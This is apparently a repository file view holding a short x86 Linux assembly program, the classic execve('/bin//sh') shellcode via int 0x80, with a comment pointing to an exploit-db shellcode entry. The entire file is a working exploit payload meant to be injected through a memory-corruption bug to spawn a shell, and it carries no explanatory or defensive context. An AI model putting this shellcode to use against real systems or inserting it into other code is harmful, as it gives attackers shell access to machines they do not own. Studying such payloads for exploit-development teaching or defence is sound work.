blob: 5ff2e123479736c438db05728e691102df67df45 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
[SECTION .text]
global _start
; https://www.exploit-db.com/shellcodes/46809
_start:
xor ecx, ecx
xor edx, edx
push 0xb
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
int 0x80
|